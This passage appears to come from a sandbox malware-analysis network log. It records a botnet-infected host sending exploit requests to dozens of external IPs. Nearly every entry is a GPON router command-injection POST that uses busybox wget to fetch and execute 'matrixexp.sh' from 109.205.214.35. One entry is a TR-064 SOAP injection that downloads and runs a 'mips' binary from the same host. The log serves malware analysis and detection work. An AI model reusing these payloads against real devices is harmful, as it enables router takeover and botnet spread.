                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        793192.168.2.1354514109.21.70.217443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656709909 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        794192.168.2.1358944118.68.228.134443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656711102 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        795192.168.2.1334982109.114.166.100443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656722069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        796192.168.2.133502642.148.216.13443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656722069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        797192.168.2.1353404109.119.164.95443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656735897 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        798192.168.2.1347596194.39.114.447547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656758070 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        799192.168.2.133428442.172.210.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656759977 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        800192.168.2.1345024109.203.251.49443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656764984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        801192.168.2.134959842.225.205.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656764984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        802192.168.2.1347726212.151.12.67443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656775951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        803192.168.2.13347265.163.178.8443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656806946 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        804192.168.2.13375305.228.112.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656836033 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        805192.168.2.1351076118.100.238.9443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656837940 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        806192.168.2.1354362109.251.13.192443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656848907 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        807192.168.2.133812842.52.232.137443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656919003 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        808192.168.2.13419985.4.207.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656920910 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        809192.168.2.134487842.209.187.221443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656930923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        810192.168.2.1355308118.15.165.108443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656981945 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        811192.168.2.1357220212.205.204.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.656994104 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        812192.168.2.13425865.116.237.41443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.657007933 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        813192.168.2.1351330118.202.255.176443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.657021046 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        814192.168.2.135290442.2.17.227443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.657040119 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        815192.168.2.135853842.76.12.93443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:59.657042027 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
